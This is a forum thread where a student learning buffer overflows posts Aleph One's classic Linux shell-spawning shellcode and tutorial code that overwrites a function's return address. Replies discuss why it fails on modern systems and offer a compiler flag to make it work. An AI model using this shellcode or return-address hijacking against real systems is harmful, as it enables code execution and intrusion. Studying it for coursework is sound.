Thread: Can't get sample shell code to work...

I'm learning about buffer overflow in class and so I looked up some stuff and stumbled upon a website with some sample code to overflow a buffer and make a shell. Here's the code below:

Code:

/*
 * Run a shell via asm.  No embedded NULL's.
 *
 * Written by Aleph One - taken from 'Smashing The Stack For Fun And Profit".
 *
 */

char shellcode[] =
	"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
	"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	"\x80\xe8\xdc\xff\xff\xff/bin/sh";

void main() {
   int *ret;

   ret = (int *)&ret + 2;
   (*ret) = (int)shellcode;

}

It came from here: Shellcode : Linux

It says it was developed for Debian GNU/Linux and should work on other distributions without change. I'm using Ubuntu, and the code doesn't seem to be working. It doesn't launch a shell or anything. Should I try a Debian GNU/Linux distrbution and see if it works? I've also tried running it remotely on one of my schools linux terminals to no avail (CentOS).

Ubuntu uses the Debian kernel, so I doubt that's the problem. The size of the int may make a difference, or possibly measures have been taken to stop that kind of security problem.

That's interesting. I'm just trying to follow the tutorial, and they don't make any mention of any problems. They just seem to imply that it works, and they show it working. Here's the tutorial: Smashing the Stack for Fun and Profit by Aleph One

Here's some simple code from the tutorial that I understand and yet it prints incorrect output:

The stack has buffer2 (takes up 12 bytes), buffer1 (takes up 8 bytes), the sfp (4 bytes), and the ret (4 bytes) since you have to address by word. So when I point ret to buffer1 and add 12, it's actually pointing to the return address. Then I bump up the return address by 8 (two words). So it should return to the print statement and skip the x = 1. However, it does execute the x=1 statement and therefore, prints out 1.

Code:

void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}

I was messing around with the simple code and changed it to this:

Code:

void function(int a, int b, int c) 
{
   char buffer1[5];
   char buffer2[10];
   int i;
   for(i=0;i<5;i++)
      printf("%x\n",&buffer1[i]);
   for(i=0;i<10;i++)
     printf("%x\n",&buffer2[i]);
   int *ret;
   ret = buffer1 + 12;
   (*ret) += 8;
}

The output of this shows that memory is going up. So if I want to overwrite the return address, I can't be doing addition because addition will mess with buffer2. I need to be subtracting I think. Why would I be seeing these results when I'm sure tons of people have been using this code?

there's only one thing which You most probably missed to do while compiling this example. Just set the flag: -mpreferred-stack-boundary=2. It will setup the stack in dword-size increments. Should help.